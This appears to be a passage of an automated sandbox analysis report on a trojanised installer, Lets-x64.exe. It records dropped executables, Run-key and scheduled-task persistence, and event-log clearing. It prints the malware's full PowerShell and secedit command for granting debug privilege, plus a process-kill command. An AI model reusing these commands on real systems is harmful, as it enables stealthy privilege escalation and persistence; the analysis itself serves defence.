                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=320').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}Jump to behavior
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                              Source: C:\Users\user\Desktop\Lets-x64.exeCode function: 0_2_00007FF668851908 LoadLibraryA,GetProcAddress,FreeLibrary,0_2_00007FF668851908
                              Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                              Source: iusb3mon.exe.17.drStatic PE information: real checksum: 0x2a75f4 should be: 0x2ab94d
                              Source: irsetup.exe.0.drStatic PE information: real checksum: 0x4f4144 should be: 0x4f9bcf
                              Source: _P18sPbB.exe.2.drStatic PE information: real checksum: 0x2a75f4 should be: 0x2ab94d
                              Source: irsetup.exe.0.drStatic PE information: section name: text
                              Source: _P18sPbB.exe.2.drStatic PE information: section name:
                              Source: _P18sPbB.exe.2.drStatic PE information: section name:
                              Source: _P18sPbB.exe.2.drStatic PE information: section name:
                              Source: _P18sPbB.exe.2.drStatic PE information: section name:
                              Source: _P18sPbB.exe.2.drStatic PE information: section name:
                              Source: _P18sPbB.exe.2.drStatic PE information: section name: .winlice
                              Source: _P18sPbB.exe.2.drStatic PE information: section name: .boot
                              Source: iusb3mon.exe.17.drStatic PE information: section name:
                              Source: iusb3mon.exe.17.drStatic PE information: section name:
                              Source: iusb3mon.exe.17.drStatic PE information: section name:
                              Source: iusb3mon.exe.17.drStatic PE information: section name:
                              Source: iusb3mon.exe.17.drStatic PE information: section name:
                              Source: iusb3mon.exe.17.drStatic PE information: section name: .winlice
                              Source: iusb3mon.exe.17.drStatic PE information: section name: .boot
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018001C378 push rdx; ret 2_2_000000018001C381
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_000000018001C388 push rdx; ret 2_2_000000018001C389
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_04C02CD0 pushfd ; ret 19_2_04C02D51
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_04C02D3F pushfd ; ret 19_2_04C02D51
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_00227845 push ecx; mov dword ptr [esp], 30CDEC6Ch28_2_00413361
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_00227845 push esi; mov dword ptr [esp], 30D613B8h28_2_0041337A
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_00227845 push eax; mov dword ptr [esp], edi28_2_00413411
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_001D6074 push ecx; ret 28_2_001D6087
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_06249E44 push eax; ret 28_2_06249E62
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_06249ED0 push eax; ret 28_2_06249EFE
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_0625E541 push ebp; retf 28_2_0625E54C
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_0625E548 push ebp; retf 28_2_0625E54C
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_06264000 push ecx; iretd 28_2_06264021
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_0626404A push es; iretd 28_2_06264074
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_0625F923 push es; iretd 28_2_0625F924
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_04D1A48F push eax; ret 28_2_04D1A4BD
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_04D1A403 push eax; ret 28_2_04D1A421
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_04D2DD9F push ss; ret 28_2_04D2DDA2
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_04D2DD63 push edx; ret 28_2_04D2DD66
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_04D2EB00 push ebp; retf 28_2_04D2EB0B
                              Source: _P18sPbB.exe.2.drStatic PE information: section name: entropy: 7.97489456626239
                              Source: iusb3mon.exe.17.drStatic PE information: section name: entropy: 7.97489456626239
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeFile created: C:\ProgramData\Program\iusb3mon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Lets-x64.exeFile created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dllJump to dropped file
                              Source: C:\Users\user\Desktop\Lets-x64.exeFile created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile created: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile created: C:\Program Files\product1\letsvpn-latest.exeJump to dropped file
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeFile created: C:\ProgramData\Program\iusb3mon.exeJump to dropped file

                              Boot Survival

                              barindex
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_062467CC shellex,SetThreadExecutionState,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,WinExec,WinExec,WinExec,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WSAStartup,socket,GetCurrentThreadId,htons,inet_addr,connect,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,GetModuleFileNameA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,ExitProcess,StartServiceCtrlDispatcherA,Sleep,GetModuleFileNameA,CopyFileA,Sleep,28_2_062467CC
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_06253F29 IsIconic,GetWindowPlacement,GetWindowRect,28_2_06253F29
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_06243B39 OpenEventLogA,ClearEventLogA,CloseEventLog,28_2_06243B39
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_0624838B CreateThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,28_2_0624838B
                              Source: C:\Users\user\Desktop\Lets-x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
